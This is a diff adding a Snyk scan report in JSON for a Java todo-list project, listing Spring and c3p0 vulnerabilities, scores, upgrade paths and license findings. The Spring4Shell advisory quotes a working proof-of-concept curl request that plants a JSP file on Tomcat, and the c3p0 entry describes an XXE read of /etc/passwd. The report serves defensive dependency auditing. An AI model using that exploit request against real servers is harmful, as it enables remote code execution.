"2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.24.RELEASE", + "org.springframework:spring-expression@5.2.24.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.20.RELEASE", + "org.springframework:spring-beans@5.2.20.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.22.RELEASE", + "org.springframework:spring-beans@5.2.22.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + }, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.21.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final" + } + ], + "ok": false, + "dependencyCount": 34, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "22 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub 